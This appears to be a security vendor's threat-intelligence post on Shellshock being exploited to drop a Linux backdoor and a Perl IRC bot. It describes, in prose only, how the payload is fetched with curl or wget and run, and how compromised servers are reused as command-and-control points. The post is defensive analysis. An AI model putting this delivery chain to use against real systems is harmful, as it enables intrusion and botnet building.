Since the Shellshock vulnerability became public knowledge, our ThreatSeeker® Intelligence Cloud has seen evidence of this vulnerability being exploited in the wild to drop malware.

We shall illustrate one such example below:

Backdoors and Bot Nets

The observed malware found to be exploiting the Shellshock vulnerability has been dropped by various command and control (C&C) servers previously known to Websense Security Labs™. The malware has the following capabilities:

A Linux backdoor, capable of DDoS attacks, brute force attacks on passwords, and receiving commands to execute from its C&C server.

A Perl IRC bot, typically capable of DDoS attacks and spreading itself by looking for exploitable servers using various vulnerabilities, such as remote file inclusion exploits.

The malware has been seen to be downloaded to a compromised machine by exploiting the Shellshock vulnerability and invoking commands such as "curl" or "wget," and then executing the malicious payload. To date, we have seen 4 variants of the Linux backdoor and several versions of the Perl-based IRC bot.

Popularity Since Vulnerability Disclosure

The following domains and IPs have been found to be used as command & control (C&C) points for this campaign (amongst others):

Figure 1: chart showing increase in prevalence of C&C associated with the above malware, peaking around September 25, 2014.

Infrastructure Re-Use

We have seen C&C traffic to these IPs in the last 2 months, showing that they have been used for malicious and bot network campaigns prior to the Shellshock vulnerability disclosure. In fact, going back as far as 2012, we see that one such C&C was used in a Point-of-Sale malware campaign known as "vSkimmer." More recently, we have observed it serving up an IRC bot.

The spike that we saw on September 25, 2014, ties in with the usage of these servers as command & control points for malware dropped in the exploitation of the Shellshock vulnerability. We have deduced that these are likely compromised servers, since we do see the infrastructure hosting legitimate websites. Cyber-criminals typically prefer compromised servers in order to piggyback on the reputation of those known hosts and to enhance their ability to remain anonymous.

Experience has taught us that as cyber-criminals zoom in on the vulnerable code branch, additional vulnerabilities are likely to surface. We strongly recommend that you monitor such issues and apply mitigation accordingly.

We have updated our ThreatSeeker Intelligence Cloud to seek out likely candidates across the kill chain.